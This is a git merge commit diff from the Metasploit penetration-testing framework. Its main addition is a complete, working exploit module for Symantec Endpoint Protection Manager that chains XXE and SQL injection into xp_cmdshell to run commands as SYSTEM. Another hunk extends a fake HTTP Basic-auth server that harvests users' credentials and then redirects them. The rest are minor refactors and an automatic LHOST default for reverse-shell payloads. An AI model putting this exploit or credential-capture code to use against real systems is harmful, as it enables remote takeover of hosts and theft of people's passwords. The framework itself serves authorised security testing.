Merge branch 'master' of github.com:rapid7/metasploit-framework

bug/bundler_fix
David Maloney 2014-02-25 15:56:24 -06:00
commit f229932d16
7 changed files with 146 additions and 7 deletions

View File

@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
)
# report the external port as being open
if inside_workspace_boundary(external_address)
if inside_workspace_boundary?(external_address)
report_service(
:host => external_address,
:port => external_port,

View File

@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
)
# also report its external address as alive
if inside_workspace_boundary(external_address)
if inside_workspace_boundary?(external_address)
report_host(
:host => external_address,
:state => Msf::HostState::Alive

View File

@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG'])
end
if inside_workspace_boundary(external_addr)
if inside_workspace_boundary?(external_addr)
report_service(
:host => external_addr,
:port => int,

View File

@ -39,7 +39,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ])
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])
], self.class)
end
@ -73,9 +74,14 @@ class Metasploit3 < Msf::Auxiliary
)
print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
send_not_found(cli)
if datastore['RedirectURL']
print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")
send_redirect(cli, datastore['RedirectURL'])
else
print_status("Sending 401 to client")
send_not_found(cli)
end
else
print_status("Sending 401 to client #{cli.peerhost}")
response = create_response(401, "Unauthorized")
response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
cli.send_response(response)

View File

@ -0,0 +1,124 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',
'Description' => %q{
This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
can reach SQL injection affected components. As xp_cmdshell is enabled in the included
database instance, it's possible to execute arbitrary system commands on the remote system
with SYSTEM privileges.
},
'Author' =>
[
'Stefan Viehbock', # Discovery
'Chris Graham', # PoC exploit
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5014' ],
[ 'CVE', '2013-5015' ],
[ 'EDB', '31853'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Windows VBS Stager', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Feb 24 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9090),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
end
def check
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
})
if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~3950
execute_cmdstager({:linemax => 3950})
end
def execute_command(cmd, opts = {})
# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
# Generate random 'xx032xxxx' sequence number.
seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
soap = soap_request(seqnum, command)
post_data = Rex::MIME::Message.new
post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
xxe = post_data.to_s
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => { 'ActionType' => 'ConsoleLog' },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => xxe,
})
if res and res.body !~ /ResponseCode/
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
end
end
def soap_request(seqnum, command)
randpayload = rand_text_alpha(8+rand(8))
randxxe = rand_text_alpha(8+rand(8))
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
xml = Document.new
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
xml.add_element("Request")
xxe = xml.root.add_element(randxxe)
xxe.text = "PAYLOAD"
xml_s = xml.to_s
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
xml_s
end
end

View File

@ -114,9 +114,15 @@ cmd = rest.pop.downcase
options = {}
rest.each do |x|
k,v = x.split("=", 2)
options[k] = v.to_s
options[k.upcase] = v.to_s
end
# if LHOST is not set auto set it
if payload_name =~ /[\_\/]reverse/ and options['LHOST'].nil?
options['LHOST'] = Rex::Socket.source_address
end
payload.datastore.merge! options
if (cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n)$/)

View File

@ -152,6 +152,9 @@ require 'msf/core/payload_generator'
k,v = x.split('=', 2)
datastore[k.upcase] = v.to_s
end
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
datastore['LHOST'] = Rex::Socket.source_address
end
end
if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin